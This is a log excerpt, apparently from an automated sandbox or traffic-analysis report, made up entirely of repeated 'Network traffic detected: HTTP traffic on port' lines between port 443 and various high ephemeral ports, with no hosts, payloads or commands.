      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
      Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
      Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
      Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
